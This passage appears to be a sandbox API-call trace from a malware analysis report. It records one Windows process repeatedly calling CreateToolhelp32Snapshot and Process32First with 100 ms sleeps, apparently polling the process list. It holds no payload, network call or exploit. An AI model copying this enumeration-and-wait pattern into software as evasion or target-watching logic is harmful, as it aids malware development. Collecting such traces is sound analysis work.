dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.714] Sleep (dwMilliseconds=0x64) [0114.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19b8 [0114.841] Process32First (in: hSnapshot=0x19b8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.915] Sleep (dwMilliseconds=0x64) [0115.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19b8 [0115.027] Process32First (in: hSnapshot=0x19b8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.111] Sleep (dwMilliseconds=0x64) [0115.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19b4 [0115.255] Process32First (in: hSnapshot=0x19b4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.369] Sleep (dwMilliseconds=0x64) [0115.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d30 [0115.483] Process32First (in: hSnapshot=0x1d30, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.553] Sleep (dwMilliseconds=0x64) [0115.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ce8 [0115.762] Process32First (in: hSnapshot=0x1ce8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.845] Sleep (dwMilliseconds=0x64) [0116.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ce8 [0116.114] Process32First (in: hSnapshot=0x1ce8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.191] Sleep (dwMilliseconds=0x64) [0116.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0116.304] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.401] Sleep (dwMilliseconds=0x64) [0116.501] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19d0 [0116.514] Process32First (in: hSnapshot=0x19d0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.665] Sleep (dwMilliseconds=0x64) [0116.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd4 [0116.778] Process32First (in: hSnapshot=0x1cd4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.981] Sleep (dwMilliseconds=0x64) [0117.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c4 [0117.200] Process32First (in: hSnapshot=0x19c4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.267] Sleep (dwMilliseconds=0x64) [0117.368] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cfc [0117.405] Process32First (in: hSnapshot=0x1cfc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.482] Sleep (dwMilliseconds=0x64) [0117.614] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d78 [0117.628] Process32First (in: hSnapshot=0x1d78, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.778] Sleep (dwMilliseconds=0x64) [0117.969] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f44 [0117.981] Process32First (in: hSnapshot=0x1f44, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.079] Sleep (dwMilliseconds=0x64) [0118.195] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x192c [0118.207] Process32First (in: hSnapshot=0x192c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.282] Sleep (dwMilliseconds=0x64) [0118.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x920 [0118.524] Process32First (in: hSnapshot=0x920, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.592] Sleep (dwMilliseconds=0x64) [0118.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cbc [0118.782] Process32First (in: hSnapshot=0x1cbc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.880] Sleep (dwMilliseconds=0x64) [0119.026] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cdc [0119.040] Process32First (in: hSnapshot=0x1cdc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.208] Sleep (dwMilliseconds=0x64) [0119.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cb8 [0119.321] Process32First (in: hSnapshot=0x1cb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.486] Sleep (dwMilliseconds=0x64) [0119.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ca4 [0119.598] Process32First (in: hSnapshot=0x1ca4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.667] Sleep (dwMilliseconds=0x64) [0119.767] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0c [0119.779] Process32First (in: hSnapshot=0x1d0c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.851] Sleep (dwMilliseconds=0x64) [0119.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19a4 [0119.963] Process32First (in: hSnapshot=0x19a4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.060] Sleep (dwMilliseconds=0x64) [0120.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a8 [0120.184] Process32First (in: hSnapshot=0x22a8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.419] Sleep (dwMilliseconds=0x64) [0120.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d48 [0120.531] Process32First (in: hSnapshot=0x1d48, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.607] Sleep (dwMilliseconds=0x64) [0120.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d48 [0120.732] Process32First (in: hSnapshot=0x1d48, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.805] Sleep (dwMilliseconds=0x64) [0120.905] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d48 [0120.919] Process32First (in: hSnapshot=0x1d48, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.988] Sleep (dwMilliseconds=0x64) [0121.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d48 [0121.107] Process32First (in: hSnapshot=0x1d48, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.179] Sleep (dwMilliseconds=0x64) [0121.280] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0121.291] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.390] Sleep (dwMilliseconds=0x64) [0121.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0121.507] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.582] Sleep (dwMilliseconds=0x64) [0121.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0121.712] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.782] Sleep (dwMilliseconds=0x64) [0121.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d48 [0121.917] Process32First (in: hSnapshot=0x1d48, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.997] Sleep (dwMilliseconds=0x64) [0122.097] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cc4 [0122.110] Process32First (in: hSnapshot=0x1cc4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.197] Sleep (dwMilliseconds=0x64) [0122.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0122.311] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.406] Sleep (dwMilliseconds=0x64) [0122.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0122.521] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.610] Sleep (dwMilliseconds=0x64) [0122.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0122.725] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.805] Sleep (dwMilliseconds=0x64) [0122.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0122.918] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.990] Sleep (dwMilliseconds=0x64) [0123.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0123.147] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.228] Sleep (dwMilliseconds=0x64) [0123.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0123.339] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.440] Sleep (dwMilliseconds=0x64) [0123.540] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0123.551] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.625] Sleep (dwMilliseconds=0x64) [0123.726] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0123.740] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.829] Sleep (dwMilliseconds=0x64) [0123.929] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0123.945] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.016] Sleep (dwMilliseconds=0x64) [0124.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0124.129] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.203] Sleep (dwMilliseconds=0x64) [0124.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0124.317] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.421] Sleep (dwMilliseconds=0x64) [0124.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f3c [0124.534] Process32First (in: hSnapshot=0x1f3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.607] Sleep (dwMilliseconds=0x64) [0125.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198c [0125.283] Process32First (in: hSnapshot=0x198c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.397] Sleep (dwMilliseconds=0x64) [0125.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cbc [0125.771] Process32First (in: hSnapshot=0x1cbc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.891] Sleep (dwMilliseconds=0x64) [0126.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c9c [0126.034] Process32First (in: hSnapshot=0x1c9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.155] Sleep (dwMilliseconds=0x64) [0126.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c9c [0126.719] Process32First (in: hSnapshot=0x1c9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.971] Sleep (dwMilliseconds=0x64) [0127.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c9c [0127.132] Process32First (in: hSnapshot=0x1c9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.203] Sleep (dwMilliseconds=0x64) [0127.307] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ccc [0127.319] Process32First (in: hSnapshot=0x1ccc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.414] Sleep (dwMilliseconds=0x64) [0127.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a10 [0127.531] Process32First (in: hSnapshot=0x1a10, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.644] Sleep (dwMilliseconds=0x64) [0127.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19f0 [0127.772] Process32First (in: hSnapshot=0x19f0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.849] Sleep (dwMilliseconds=0x64) [0127.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0127.966] Process32First (in: hSnapshot=0x1d14, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.053] Sleep (dwMilliseconds=0x64) [0128.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0128.201] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.294] Sleep (dwMilliseconds=0x64) [0128.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0128.406] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.502] Sleep (dwMilliseconds=0x64) [0128.603] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0128.618] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.736] Sleep (dwMilliseconds=0x64) [0128.837] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0128.856] Process32First (in: hSnapshot=0x1d14, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.939] Sleep (dwMilliseconds=0x64) [0129.040] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0129.055] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.147] Sleep (dwMilliseconds=0x64) [0129.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0129.261] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.351] Sleep (dwMilliseconds=0x64) [0129.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0129.467] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.571] Sleep 